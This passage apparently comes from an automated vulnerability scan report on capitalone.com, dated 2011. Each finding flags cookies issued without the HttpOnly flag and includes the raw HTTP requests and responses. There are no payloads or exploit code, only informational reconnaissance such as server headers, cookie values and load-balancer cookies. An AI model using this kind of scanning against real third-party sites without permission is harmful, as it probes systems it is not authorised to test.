Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:41 GMT
Server: Apache
Location: https://www.capitalone.com/protection/privacy/index.php
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:12:41 GMT
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.capitalone.
...[SNIP]...

11.448. http://www.capitalone.com/legal/security.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /legal/security.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /legal/security.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:42 GMT
Server: Apache
Location: http://www.capitalone.com/protection/security/index.php
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:12:42 GMT
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

11.449. http://www.capitalone.com/legal/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /legal/terms.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /legal/terms.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:42 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 29875

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Capital One &shy; Terms and Conditions</title>
<link href="/stylesheets/
...[SNIP]...

11.450. http://www.capitalone.com/loans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /loans/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 22518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One offer
...[SNIP]...

11.451. http://www.capitalone.com/media/pdf/Foreign_Bank_Account_Certification_-_Capital_One.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /media/pdf/Foreign_Bank_Account_Certification_-_Capital_One.pdf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/pdf/Foreign_Bank_Account_Certification_-_Capital_One.pdf HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:43 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 04 Dec 2009 19:11:12 GMT
Accept-Ranges: bytes
Content-Length: 207453
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/pdf
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

%PDF-1.4%....
16 0 obj <</Linearized 1/L 207453/O 18/E 75169/N 4/T 207086/H [ 436 150]>>endobj
xref
16 7
0000000016 00000 n
0000000586 00000 n
0000000648 00000 n
0000000779 0
...[SNIP]...

11.452. http://www.capitalone.com/onlinebanking/overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /onlinebanking/overview.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /onlinebanking/overview.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:36 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23649

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi
...[SNIP]...

11.453. http://www.capitalone.com/onlineopinionF3cS/oo_conf_en-US.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:44 GMT
Server: Apache
Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT
Accept-Ranges: bytes
Content-Length: 1602
Expires: Thu, 03 Feb 2011 22:12:44 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

/* OnlineOpinion (F3cS,en-US) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var O_pth='/online
...[SNIP]...

11.454. http://www.capitalone.com/onlineopinionF3cS/oo_engine.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /onlineopinionF3cS/oo_engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineopinionF3cS/oo_engine.js HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:44 GMT
Server: Apache
Last-Modified: Mon, 12 Jun 2006 14:35:32 GMT
Accept-Ranges: bytes
Content-Length: 7305
Expires: Thu, 03 Feb 2011 22:12:44 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

/* OnlineOpinion (F3cS,8448b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,O_t
...[SNIP]...

11.455. http://www.capitalone.com/personalloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /personalloans/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalloans/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:27 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 21748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Personal Loans: A
...[SNIP]...

11.456. http://www.capitalone.com/protection/privacy/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /protection/privacy/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /protection/privacy/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:36 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 23417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

11.457. http://www.capitalone.com/protection/security/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /protection/security/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /protection/security/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

11.458. http://www.capitalone.com/redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /redirect.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:11:48 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/



11.459. http://www.capitalone.com/rewards/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /rewards/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rewards/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:50 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi
...[SNIP]...

11.460. http://www.capitalone.com/rewards/service-login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /rewards/service-login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rewards/service-login.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:49 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 20960

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha
...[SNIP]...

11.461. http://www.capitalone.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /sitemap/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:34 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 42178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One - Sit
...[SNIP]...

11.462. https://www.capitalone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000

Response

HTTP/1.1 200 OK
